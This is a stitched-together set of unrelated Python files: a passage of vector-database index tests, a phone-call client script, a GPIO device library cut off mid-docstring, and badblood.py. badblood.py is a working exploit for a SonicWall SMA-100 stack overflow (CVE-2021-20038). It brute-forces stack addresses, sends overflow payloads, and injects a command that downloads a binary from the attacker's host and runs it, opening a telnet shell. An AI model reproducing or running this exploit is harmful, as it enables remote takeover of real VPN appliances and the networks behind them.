connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_without_connect(self, dis_connect, collection): ''' target: test drop index without connection method: drop index, and check if drop successfully expected: raise exception ''' with pytest.raises(Exception) as e: dis_connect.drop_index(collection, field_name) @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index_collection_not_existed(self, connect): ''' target: test drop index interface when collection name not existed method: create collection and add entities in it, create index , make sure the collection name not in index, and then drop it expected: return code not equals to 0, drop index failed ''' collection_name = gen_unique_str(uid) with pytest.raises(Exception) as e: connect.drop_index(collection_name, field_name) @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index_collection_not_create(self, connect, collection): ''' target: test drop index interface when index not created method: create collection and add entities in it, create index expected: return code not equals to 0, drop index failed ''' # no create index connect.drop_index(collection, field_name) @pytest.mark.level(2) def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index): ''' target: test create / drop index repeatedly, use the same index params method: create index, drop index, four times expected: return code 0 ''' for i in range(4): connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) def test_drop_index_ip(self, connect, collection, get_simple_index): ''' target: test drop index interface method: create collection and add entities in it, create index, call drop index expected: return code 0, and default index param ''' # ids = connect.insert(collection, entities) get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index): ''' target: test drop index repeatedly method: create index, call drop index, and drop again expected: return code 0 ''' get_simple_index["metric_type"] = "IP" connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) connect.drop_index(collection, field_name) index = connect.describe_index(collection, "") assert not index @pytest.mark.level(2) def test_drop_index_without_connect_ip(self, dis_connect, collection): ''' target: test drop index without connection method: drop index, and check if drop successfully expected: raise exception ''' with pytest.raises(Exception) as e: dis_connect.drop_index(collection, field_name) def test_drop_index_collection_not_create_ip(self, connect, collection): ''' target: test drop index interface when index not created method: create collection and add entities in it, create index expected: return code not equals to 0, drop index failed ''' # ids = connect.insert(collection, entities) # no create index connect.drop_index(collection, field_name) @pytest.mark.level(2) def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index): ''' target: test create / drop index repeatedly, use the same index params method: create index, drop index, four times expected: return code 0 ''' get_simple_index["metric_type"] = "IP" for i in range(4): connect.create_index(collection, field_name, get_simple_index) connect.drop_index(collection, field_name) @pytest.mark.tags(CaseLabel.tags_smoke) def test_create_PQ_without_nbits(self, connect, collection): PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"} ids = connect.insert(collection, default_entities) connect.create_index(collection, field_name, PQ_index) index = connect.describe_index(collection, "") create_target_index(PQ_index, field_name) assert index == PQ_index class TestIndexBinary: @pytest.fixture( scope="function", params=gen_simple_index() ) def get_simple_index(self, request, connect): # if str(connect._cmd("mode")) == "CPU": # if request.param["index_type"] in index_cpu_not_support(): # pytest.skip("sq8h not support in CPU mode") return copy.deepcopy(request.param) @pytest.fixture( scope="function", params=gen_binary_index() ) def get_jaccard_index(self, request, connect): if request.param["index_type"] in binary_support(): request.param["metric_type"] = "JACCARD" return request.param else: pytest.skip("Skip index") @pytest.fixture( scope="function", params=gen_binary_index() ) def get_l2_index(self, request, connect): request.param["metric_type"] = "L2" return request.param @pytest.fixture( scope="function", params=[ 1, 10, 1111 ], ) def get_nq(self, request): yield request.param """ ****************************************************************** The following cases are used to test `create_index` function ****************************************************************** """ @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index(self, connect, binary_collection, get_jaccard_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(binary_collection, default_binary_entities) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) binary_index = connect.describe_index(binary_collection, "") create_target_index(get_jaccard_index, binary_field_name) assert binary_index == get_jaccard_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_partition(self, connect, binary_collection, get_jaccard_index): ''' target: test create index interface method: create collection, create partition, and add entities in it, create index expected: return search success ''' connect.create_partition(binary_collection, default_tag) ids = connect.insert(binary_collection, default_binary_entities, partition_tag=default_tag) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) binary_index = connect.describe_index(binary_collection, "") create_target_index(get_jaccard_index, binary_field_name) assert binary_index == get_jaccard_index @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq): ''' target: test create index interface, search with more query vectors method: create collection and add entities in it, create index expected: return search success ''' nq = get_nq ids = connect.insert(binary_collection, default_binary_entities) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) connect.load_collection(binary_collection) query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, nq, metric_type="JACCARD") search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD") logging.getLogger().info(search_param) res = connect.search(binary_collection, query, search_params=search_param) assert len(res) == nq @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index): ''' target: test create index interface with invalid metric type method: add entitys into binary connection, flash, create index with L2 metric type. expected: return create_index failure ''' # insert 6000 vectors ids = connect.insert(binary_collection, default_binary_entities) connect.flush([binary_collection]) with pytest.raises(Exception) as e: res = connect.create_index(binary_collection, binary_field_name, get_l2_index) """ ****************************************************************** The following cases are used to test `describe_index` function *************************************************************** """ @pytest.mark.skip("repeat with test_create_index binary") def _test_get_index_info(self, connect, binary_collection, get_jaccard_index): ''' target: test describe index interface method: create collection and add entities in it, create index, call describe index expected: return code 0, and index instructure ''' ids = connect.insert(binary_collection, default_binary_entities) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) stats = connect.get_collection_stats(binary_collection) assert stats["row_count"] == default_nb for partition in stats["partitions"]: segments = partition["segments"] if segments: for segment in segments: for file in segment["files"]: if "index_type" in file: assert file["index_type"] == get_jaccard_index["index_type"] @pytest.mark.skip("repeat with test_create_index_partition binary") def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index): ''' target: test describe index interface method: create collection, create partition and add entities in it, create index, call describe index expected: return code 0, and index instructure ''' connect.create_partition(binary_collection, default_tag) ids = connect.insert(binary_collection, default_binary_entities, partition_tag=default_tag) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) stats = connect.get_collection_stats(binary_collection) logging.getLogger().info(stats) assert stats["row_count"] == default_nb assert len(stats["partitions"]) == 2 for partition in stats["partitions"]: segments = partition["segments"] if segments: for segment in segments: for file in segment["files"]: if "index_type" in file: assert file["index_type"] == get_jaccard_index["index_type"] """ ****************************************************************** The following cases are used to test `drop_index` function ****************************************************************** """ def test_drop_index(self, connect, binary_collection, get_jaccard_index): ''' target: test drop index interface method: create collection and add entities in it, create index, call drop index expected: return code 0, and default index param ''' connect.create_index(binary_collection, binary_field_name, get_jaccard_index) stats = connect.get_collection_stats(binary_collection) logging.getLogger().info(stats) connect.drop_index(binary_collection, binary_field_name) binary_index = connect.describe_index(binary_collection, "") assert not binary_index @pytest.mark.tags(CaseLabel.tags_smoke) def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index): ''' target: test drop index interface method: create collection, create partition and add entities in it, create index on collection, call drop collection index expected: return code 0, and default index param ''' connect.create_partition(binary_collection, default_tag) ids = connect.insert(binary_collection, default_binary_entities, partition_tag=default_tag) connect.flush([binary_collection]) connect.create_index(binary_collection, binary_field_name, get_jaccard_index) connect.drop_index(binary_collection, binary_field_name) binary_index = connect.describe_index(binary_collection, "") assert not binary_index class TestIndexInvalid(object): """ Test create / describe / drop index interfaces with invalid collection names """ @pytest.fixture( scope="function", params=gen_invalid_strs() ) def get_collection_name(self, request): yield request.param @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.level(1) def test_create_index_with_invalid_collection_name(self, connect, get_collection_name): collection_name = get_collection_name with pytest.raises(Exception) as e: connect.create_index(collection_name, field_name, default_index) @pytest.mark.level(1) def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name): collection_name = get_collection_name with pytest.raises(Exception) as e: connect.drop_index(collection_name) @pytest.fixture( scope="function", params=gen_invalid_index() ) def get_index(self, request): yield request.param @pytest.mark.level(2) def test_create_index_with_invalid_index_params(self, connect, collection, get_index): logging.getLogger().info(get_index) with pytest.raises(Exception) as e: connect.create_index(collection, field_name, get_index) class TestIndexAsync: @pytest.fixture(scope="function", autouse=True) def skip_http_check(self, args): if args["handler"] == "HTTP": pytest.skip("skip in http mode") """ ****************************************************************** The following cases are used to test `create_index` function ****************************************************************** """ @pytest.fixture( scope="function", params=gen_simple_index() ) def get_simple_index(self, request, connect): # if str(connect._cmd("mode")) == "CPU": # if request.param["index_type"] in index_cpu_not_support(): # pytest.skip("sq8h not support in CPU mode") return copy.deepcopy(request.param) def check_result(self, res): logging.getLogger().info("In callback check search result") logging.getLogger().info(res) """ ****************************************************************** The following cases are used to test `create_index` function ****************************************************************** """ @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) logging.getLogger().info("start index") future = connect.create_index(collection, field_name, get_simple_index, _async=True) logging.getLogger().info("before result") res = future.result() # TODO: logging.getLogger().info(res) @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_drop(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) logging.getLogger().info("start index") future = connect.create_index(collection, field_name, get_simple_index, _async=True) logging.getLogger().info("DROP") connect.drop_collection(collection) @pytest.mark.level(2) def test_create_index_with_invalid_collection_name(self, connect): collection_name = " " with pytest.raises(Exception) as e: future = connect.create_index(collection_name, field_name, default_index, _async=True) res = future.result() @pytest.mark.tags(CaseLabel.tags_smoke) @pytest.mark.timeout(BUILD_TIMEOUT) def test_create_index_callback(self, connect, collection, get_simple_index): ''' target: test create index interface method: create collection and add entities in it, create index expected: return search success ''' ids = connect.insert(collection, default_entities) logging.getLogger().info("start index") future = connect.create_index(collection, field_name, get_simple_index, _async=True, _callback=self.check_result) logging.getLogger().info("before result") res = future.result() # TODO: logging.getLogger().info(res)
make_multiple_calls.py
import uuid from ondewo.vtsi.client import VtsiClient from ondewo.vtsi.voip_pb2 import StartCallInstanceResponse, StartMultipleCallInstancesResponse # SIP SIP_SIM_VERSION: str = "latest" # VTSI_SERVER # For testing purposes 0.0.0.0 can be used VTSI_HOST: str = "grpc-vtsi.ondewo.com" VTSI_PORT: int = 443 # PROJECT PROJECT_ID: str = "example_project_id" ######################################### # Phone numbers to call PHONE_NUMBERS = ["+11233232", "+2342345"] # get_minimal_client() returns the minimal working VTSI client client: VtsiClient = VtsiClient.get_minimal_client(voip_host=VTSI_HOST, voip_port=str(VTSI_PORT)) # deploy_caller() function for multi-threading def deploy_caller(phone_number: str) -> StartCallInstanceResponse: response: StartCallInstanceResponse = client.start_caller( phone_number=phone_number, call_id=str(uuid.uuid4()), sip_sim_version=SIP_SIM_VERSION, project_id=PROJECT_ID, ) return response # Old method to start multiple calls, new method is more general # Iterating through phone number list, start the parallel calls # threads: List[Thread] = [ # threading.Thread(target=deploy_caller, args=[phone_number]) # for phone_number in PHONE_NUMBERS # ] # for thread in threads: # thread.start() # Start multiple call instances via endpoint response: StartMultipleCallInstancesResponse = client.start_multiple_call_instances( phone_numbers_by_call_ids={'1': PHONE_NUMBERS[0], '2': PHONE_NUMBERS[1]}, call_ids=['1', '2'], sip_sim_version=SIP_SIM_VERSION, project_id=PROJECT_ID, )
badblood.py
from __future__ import division from http.server import HTTPServer, BaseHTTPRequestHandler from multiprocessing import Pool from functools import partial from itertools import repeat from threading import Thread import argparse import socket import time import ssl import sys import os def do_banner(): print("") print("▄▄▄▄ ▄▄▄ ▓█████▄ ▄▄▄▄ ██▓ ▒█████ ▒█████ ▓█████▄ ") print("▓█████▄ ▒████▄ ▒██▀ ██▌ ▓█████▄ ▓██▒ ▒██▒ ██▒▒██▒ ██▒▒██▀ ██▌ ") print("▒██▒ ▄██▒██ ▀█▄ ░██ █▌ ▒██▒ ▄██▒██░ ▒██░ ██▒▒██░ ██▒░██ █▌") print("▒██░█▀ ░██▄▄▄▄██ ░▓█▄ ▌ ▒██░█▀ ▒██░ ▒██ ██░▒██ ██░░▓█▄ ▌ ") print("░▓█ ▀█▓ ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ ") print("░▒▓███▀▒ ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒░ ▒░▓ ░░ ▒░▒░▒░ ░ ▒░▒░▒░ ▒▒▓ ▒ ") print("▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░ ▒ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ▒ ▒ ") print(" ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░ ░ ") print(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") print(" ░ ░ ░ ░ ") print("") ## # The server that listens for the exploits HTTP callback. The script is hard coded below. Basically, # it will download busybox to the box, and create a telnet service on 1270 for the attacker to # telnet to. ## class PayloadServer(BaseHTTPRequestHandler): def do_GET(self): print('\n[*] Received an HTTP callback from %s at %s' % (self.address_string(), self.log_date_time_string())) self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() self.wfile.write(b"#!/bin/sh\ncurl --insecure https://www.busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-i686 -o /tmp/busybox\nchmod +x /tmp/busybox\n/tmp/busybox telnetd -p 1270 -l /bin/bash\n") ## # Loops through the possible top addresses and returns an array ## def generate_stack_top_addresses(): base = 0xbf800000 curr = base step = 0x1000 base_array = [] while curr != 0xbffff000: base_array.append(curr) curr += step return base_array ## # Our strategy is to try addresses in the middle of the range and work outwards. That means # that we are always trying to exploit the most likely to be exploited addresses first. ## def generate_all_addresses(top_addresses, low, high): # the array of addresses that we'll return all_array = [] # Start with the median value and work outward start_value = (high + low) // 2 # Ensure this is aligned if (start_value % 0x10) != 0: print('[-] Address generation failed: %lx' % (start_value % 0x10)) return all_array # step_values will be treated as a fifo step_values = [] step_values.append(start_value) # visited steps step_set = set() # produce all the addresses while step_values: curr_step = step_values.pop(0) # for each base address, produce the current step for base in top_addresses: address = base - curr_step # subtract! we are working off of top addresses all_array.append(address) step_set.add(curr_step) # increment / decrement the step high_step = curr_step + 0x10 if (high_step not in step_set and high_step < high): step_values.append(high_step) low_step = curr_step - 0x10 if (low_step not in step_set and low_step > low): step_values.append(low_step) return all_array ## # The payload ~as written~ guesses multiple addresses at once. Technically four last I looked. # This would need to be updated if that changed at all. This function just returns a list that # ensures all addresses are visited once. # # How does the payload guess four at once? Well. The way the payload is currently written, we # know we are dereferencing a stack address. We specifically dereference $ebp+8 (from # the context of the mod_cgi.so+0x003fe6). $ebp+8, when successful, dereferences to $ebp+12. # However! It can also be successful if it dereferences to $ebp+12+0x50 since the data is # repeated 0x50 after the first one. As such, if [$ebp+8] dereferences to the next address or # 0x50+4, either way we win. So we can exclude every 0x50th guess. ## def filter_addresses(address_list): return_list = [] visited_set = set() for address in address_list: if address not in visited_set: return_list.append(address) visited_set.add(address) visited_set.add(address - 0x50) visited_set.add(address + 0x170) visited_set.add(address + 0x1c0) return return_list ## # Sends a payload that will crash a fork. Loop and do it 64 times # for good measure. ## def send_crashes(host, port): for x in range(64): request = b'GET /badblood?' + (b'a'*400) + b'\r\n\r\n' ssl_request(args.rhost, args.rport, request) ## # Adjust the start address so that it will point to the # second address. URL encode. ## def test_and_encode_first_address(address): address -= 0x110 address += 4 one = (address >> 24) & 0x000000ff two = (address >> 16) & 0x000000ff three = (address >> 8) & 0x000000ff four = (address & 0x000000ff) if one == 0 or two == 0 or three == 0 or four == 0: return "" addr_one = (b"%" + str.encode('{:02x}'.format(four, 'x')) + b"%" + str.encode('{:02x}'.format(three, 'x')) + b"%" + str.encode('{:02x}'.format(two, 'x')) + b"%" + str.encode('{:02x}'.format(one, 'x'))) return addr_one ## # Adjusts the start address so that it will point to the call to # system, url enocde, and check for invalid values. ## def test_and_encode_second_address(address): address += 8 one = (address >> 24) & 0x000000ff two = (address >> 16) & 0x000000ff three = (address >> 8) & 0x000000ff four = (address & 0x000000ff) if one == 0x28 or two == 0x28 or three == 0x28 or four == 0x28: # shell metacharacters break the payload :grimacing: return "" addr_two = (b"%" + str.encode('{:02x}'.format(four, 'x')) + b"%" + str.encode('{:02x}'.format(three, 'x')) + b"%" + str.encode('{:02x}'.format(two, 'x')) + b"%" + str.encode('{:02x}'.format(one, 'x'))) return addr_two ## # Generic open socket, do ssl, send data, close socket. # Don't wait around for a response ## def ssl_request(host, addr, request): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) wrappedSocket = ssl.wrap_socket(sock) wrappedSocket.connect((host, addr)) wrappedSocket.send(request) wrappedSocket.recv(1) wrappedSocket.close() ## # Handles a single HTTP request before killing the program. ## def serve_once(httpd): httpd.handle_request() print('[*] Now we got bad blood. Hey! 🦞') sys.stdout = open(os.devnull, "w") # hang the connection and ensure the download happens time.sleep(5) os._exit(1) ## # Formats the exploit given the address, etc. and then shoves it out an SSL connection ## def send_exploit(address, rhost, rport, lhost, system_addr, rhostname): encoded_addr_one = test_and_encode_first_address(address) if encoded_addr_one == "": return encoded_addr_two = test_and_encode_second_address(address) if encoded_addr_two == "": return # the only variable sized item in the "shell_cmd" below is the lhost. because # alignment is so important to the final payload, we have to pad out command. pad = 'a' * (15 - len(lhost)) # the shell_cmd that will get executed. Basic callback, download, chmod, and execute shell_cmd = ";{curl," + lhost + ":1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;" + pad exploit = encoded_addr_one + encoded_addr_two + encoded_addr_two + system_addr + shell_cmd.encode('utf-8') # adjust the trailing z's to account for the hostname size and IP address size spray_pray = b"/" + (exploit*2) + b"?" + (b'z'*(476-len(lhost)-len(rhostname))) request = b'GET ' + spray_pray + b'\r\n\r\n' ssl_request(rhost, rport, request) # The httpd executable does not have a randomized base so we'll # jump through that in order to reach system(). Below are the # supported versions and the httpd address. version_dict = { "10.2.1.2-24sv": b"%08%b7%06%08", "10.2.1.1-19sv": b"%64%b8%06%08", "10.2.1.0-17sv": b"%64%b8%06%08" } # Dump the supported version dict to screen def print_supported_versions(): print("[+] Supported versions:") for key, value in version_dict.items() : print("\t- %s" % key) if __name__ == '__main__': do_banner() top_parser = argparse.ArgumentParser(description='SonicWall SMA-100 Series Stack-Buffer Overflow Exploit (CVE-2021-20038)') required_args = top_parser.add_argument_group('required arguments') required_args.add_argument('--rhost', action="store", dest="rhost", required=True, help="The IPv4 address to connect to") required_args.add_argument('--rport', action="store", dest="rport", type=int, help="The port to connect to", default="443") required_args.add_argument('--lhost', action="store", dest="lhost", required=True, help="The address to connect back to") required_args.add_argument('--rversion',action="store", dest="rversion", help="The version of the remote target") required_args.add_argument('--rhostname',action="store", dest="rhostname", help="The hostname of the remote target target", default="sslvpn") top_parser.add_argument('--supported-versions',action="store_true", dest="supported_versions", help="The list of supported SMA-100 versions") top_parser.add_argument('--workers', action="store", dest="workers", type=int, required=False, help="The number of workers to spew the exploit", default=4) top_parser.add_argument('--nocrash', action="store_true", dest="nocrash", help="Stops the exploit from sending a series of crash payload to start") top_parser.add_argument('--enable-stderr', action="store_true", dest="enablestderr", help="Enable stderr for debugging") top_parser.add_argument('--addr', action="store", dest="addr", type=int, required=False, help="Test only. If you know the crash address, go wild.", default=0) top_parser.add_argument('--top-addr', action="store", dest="top_addr", type=int, required=False, help="Test only. If you know the stack's top address, go wild.", default=0) args = top_parser.parse_args() if args.supported_versions == True: print_supported_versions() sys.exit(1) if args.rversion not in version_dict: printf("[-] User specified an unsupported SMA-100 version. Exiting.") sys.exit(1) if len(args.lhost) > 15: printf('[-] lhost must be less than 16 bytes. Alignment issues, sorry!') sys.exit(1) # Spin up a server for the exploit to call back to print('[+] Spinning up HTTP server') httpd = HTTPServer((args.lhost, 1270), PayloadServer) httpd_thread = Thread(target=serve_once, args=(httpd, )) httpd_thread.setDaemon(True) httpd_thread.start() # Generate the addresses we'll craft into the exploit payload if args.addr != 0: print('[+] User provided the crash address: %lx' % args.addr) all_addresses = [ args.addr ] elif args.top_addr != 0: print('[+] User provided the top stack address: %lx' % args.top_addr) top_addresses = [ args.top_addr ] all_addresses = generate_all_addresses(top_addresses, 0x800, 0x2800) print('[+] Generated %u total addresses to search' % len(all_addresses)) else: print('[+] User did not provide an address. We\'ll guess it.') top_addresses = generate_stack_top_addresses() print('[+] Generated %u base addresses' % len(top_addresses)) all_addresses = generate_all_addresses(top_addresses, 0x800, 0x2800) print('[+] Generated %u total addresses to search' % len(all_addresses)) # Filter the addresses. Our payload guess multiple addresses at once print('[+] Filtering addresses for double visits (thanks awesome payload!)') all_addresses = filter_addresses(all_addresses) print('[+] Filtered down to %u total addresses to search' % len(all_addresses)) if args.nocrash == False: # Send 64 requests to crash all the forks. That's probably enough. print('[+] Crashing all forks to reset stack to a semi-predicatable state') send_crashes(args.rhost, args.rport) print('[+] Crashing complete. Good job. Let\'s go do work.') else: print('[!] Skipping fork crashing at user request.') if args.enablestderr == False: print('[+] Disabling stderr') sys.stderr = open(os.devnull, "w") print('[+] Spawning %u workers' % args.workers) pool = Pool(processes=args.workers) address_count = len(all_addresses) print('[+] Attempting to exploit the remote server. This might take quite some time. :eek:') for i, _ in enumerate(pool.imap(partial(send_exploit, rhost=args.rhost, rport=args.rport, lhost=args.lhost, system_addr=version_dict[args.rversion], rhostname=args.rhostname), all_addresses)): print('\r[%] Addresses Tested: {0:.0f}%'.format((i/address_count) * 100), end='') print('\n[!] Done guessing addresses. Let us sleep for a few seconds and hope for success') time.sleep(3) print('[?] If you are reading this, the exploit likely failed.')
output_devices.py
from __future__ import ( unicode_literals, print_function, absolute_import, division, ) from threading import Lock from itertools import repeat, cycle, chain from colorzero import Color, Red, Green, Blue from collections import OrderedDict from .exc import OutputDeviceBadValue, GPIOPinMissing from .devices import GPIODevice, Device, CompositeDevice from .mixins import SourceMixin from .threads import GPIOThread class OutputDevice(SourceMixin, GPIODevice): """ Represents a generic GPIO output device. This class extends :class:`GPIODevice` to add facilities common to GPIO output devices: an :meth:`on` method to switch the device on, a corresponding :meth:`off` method, and a :meth:`toggle` method. :param int pin: The GPIO pin (in BCM numbering) that the device is connected to. If this is ``None`` a :exc:`GPIOPinMissing` will be raised. :param bool active_high: If ``True`` (the default), the :meth:`on` method will set the GPIO to HIGH. If ``False``, the :meth:`on` method will set the GPIO to LOW (the :meth:`off` method always does the opposite). :param bool initial_value: If ``False`` (the default), the device will be off initially. If ``None``, the device will be left in whatever state the pin is found in when configured for output (warning: this can be on). If ``True``, the device will be switched on initially. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, active_high=True, initial_value=False, pin_factory=None): super(OutputDevice, self).__init__(pin, pin_factory=pin_factory) self._lock = Lock() self.active_high = active_high if initial_value is None: self.pin.function = 'output' else: self.pin.output_with_state(self._value_to_state(initial_value)) def _value_to_state(self, value): return bool(self._active_state if value else self._inactive_state) def _write(self, value): try: self.pin.state = self._value_to_state(value) except AttributeError: self._check_open() raise def on(self): """ Turns the device on. """ self._write(True) def off(self): """ Turns the device off. """ self._write(False) def toggle(self): """ Reverse the state of the device. If it's on, turn it off; if it's off, turn it on. """ with self._lock: if self.is_active: self.off() else: self.on() @property def value(self): """ Returns ``True`` if the device is currently active and ``False`` otherwise. Setting this property changes the state of the device. """ return super(OutputDevice, self).value @value.setter def value(self, value): self._write(value) @property def active_high(self): """ When ``True``, the :attr:`value` property is ``True`` when the device's :attr:`pin` is high. When ``False`` the :attr:`value` property is ``True`` when the device's pin is low (i.e. the value is inverted). This property can be set after construction; be warned that changing it will invert :attr:`value` (i.e. changing this property doesn't change the device's pin state - it just changes how that state is interpreted). """ return self._active_state @active_high.setter def active_high(self, value): self._active_state = True if value else False self._inactive_state = False if value else True def __repr__(self): try: return '<gpiozero.%s object on pin %r, active_high=%s, is_active=%s>' % ( self.__class__.__name__, self.pin, self.active_high, self.is_active) except: return super(OutputDevice, self).__repr__() class DigitalOutputDevice(OutputDevice): """ Represents a generic output device with typical on/off behaviour. This class extends :class:`OutputDevice` with a :meth:`blink` method which uses an optional background thread to handle toggling the device state without further interaction. """ def __init__( self, pin=None, active_high=True, initial_value=False, pin_factory=None): self._blink_thread = None self._controller = None super(DigitalOutputDevice, self).__init__( pin, active_high, initial_value, pin_factory=pin_factory ) @property def value(self): return self._read() @value.setter def value(self, value): self._stop_blink() self._write(value) def close(self): self._stop_blink() super(DigitalOutputDevice, self).close() def on(self): self._stop_blink() self._write(True) def off(self): self._stop_blink() self._write(False) def blink(self, on_time=1, off_time=1, n=None, background=True): """ Make the device turn on and off repeatedly. :param float on_time: Number of seconds on. Defaults to 1 second. :param float off_time: Number of seconds off. Defaults to 1 second. :param int n: Number of times to blink; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue blinking and return immediately. If ``False``, only return when the blink is finished (warning: the default value of *n* will result in this method never returning). """ self._stop_blink() self._blink_thread = GPIOThread( target=self._blink_device, args=(on_time, off_time, n) ) self._blink_thread.start() if not background: self._blink_thread.join() self._blink_thread = None def _stop_blink(self): if getattr(self, '_controller', None): self._controller._stop_blink(self) self._controller = None if getattr(self, '_blink_thread', None): self._blink_thread.stop() self._blink_thread = None def _blink_device(self, on_time, off_time, n): iterable = repeat(0) if n is None else repeat(0, n) for _ in iterable: self._write(True) if self._blink_thread.stopping.wait(on_time): break self._write(False) if self._blink_thread.stopping.wait(off_time): break class LED(DigitalOutputDevice): """ Extends :class:`DigitalOutputDevice` and represents a light emitting diode (LED). Connect the cathode (short leg, flat side) of the LED to a ground pin; connect the anode (longer leg) to a limiting resistor; connect the other side of the limiting resistor to a GPIO pin (the limiting resistor can be placed either side of the LED). The following example will light the LED:: from gpiozero import LED led = LED(17) led.on() :param int pin: The GPIO pin which the LED is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the LED will operate normally with the circuit described above. If ``False`` you should wire the cathode to the GPIO pin, and the anode to a 3V3 pin (via a limiting resistor). :param bool initial_value: If ``False`` (the default), the LED will be off initially. If ``None``, the LED will be left in whatever state the pin is found in when configured for output (warning: this can be on). If ``True``, the LED will be switched on initially. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ pass LED.is_lit = LED.is_active class Buzzer(DigitalOutputDevice): """ Extends :class:`DigitalOutputDevice` and represents a digital buzzer component. Note that this interface is only capable of simple on/off commands, and is not capable of playing a variety of tones. Connect the cathode (negative pin) of the buzzer to a ground pin; connect the other side to any GPIO pin. The following example will sound the buzzer:: from gpiozero import Buzzer bz = Buzzer(3) bz.on() :param int pin: The GPIO pin which the buzzer is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the buzzer will operate normally with the circuit described above. If ``False`` you should wire the cathode to the GPIO pin, and the anode to a 3V3 pin. :param bool initial_value: If ``False`` (the default), the buzzer will be silent initially. If ``None``, the buzzer will be left in whatever state the pin is found in when configured for output (warning: this can be on). If ``True``, the buzzer will be switched on initially. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ pass Buzzer.beep = Buzzer.blink class PWMOutputDevice(OutputDevice): """ Generic output device configured for pulse-width modulation (PWM). :param int pin: The GPIO pin which the device is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the :meth:`on` method will set the GPIO to HIGH. If ``False``, the :meth:`on` method will set the GPIO to LOW (the :meth:`off` method always does the opposite). :param float initial_value: If ``0`` (the default), the device's duty cycle will be 0 initially. Other values between 0 and 1 can be specified as an initial duty cycle. Note that ``None`` cannot be specified (unlike the parent class) as there is no way to tell PWM not to alter the state of the pin. :param int frequency: The frequency (in Hz) of pulses emitted to drive the device. Defaults to 100Hz. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, active_high=True, initial_value=0, frequency=100, pin_factory=None): self._blink_thread = None self._controller = None if not 0 <= initial_value <= 1: raise OutputDeviceBadValue("initial_value must be between 0 and 1") super(PWMOutputDevice, self).__init__( pin, active_high, initial_value=None, pin_factory=pin_factory ) try: # XXX need a way of setting these together self.pin.frequency = frequency self.value = initial_value except: self.close() raise def close(self): try: self._stop_blink() except AttributeError: pass try: self.pin.frequency = None except AttributeError: # If the pin's already None, ignore the exception pass super(PWMOutputDevice, self).close() def _state_to_value(self, state): return float(state if self.active_high else 1 - state) def _value_to_state(self, value): return float(value if self.active_high else 1 - value) def _write(self, value): if not 0 <= value <= 1: raise OutputDeviceBadValue("PWM value must be between 0 and 1") super(PWMOutputDevice, self)._write(value) @property def value(self): """ The duty cycle of the PWM device. 0.0 is off, 1.0 is fully on. Values in between may be specified for varying levels of power in the device. """ return self._read() @value.setter def value(self, value): self._stop_blink() self._write(value) def on(self): self._stop_blink() self._write(1) def off(self): self._stop_blink() self._write(0) def toggle(self): """ Toggle the state of the device. If the device is currently off (:attr:`value` is 0.0), this changes it to "fully" on (:attr:`value` is 1.0). If the device has a duty cycle 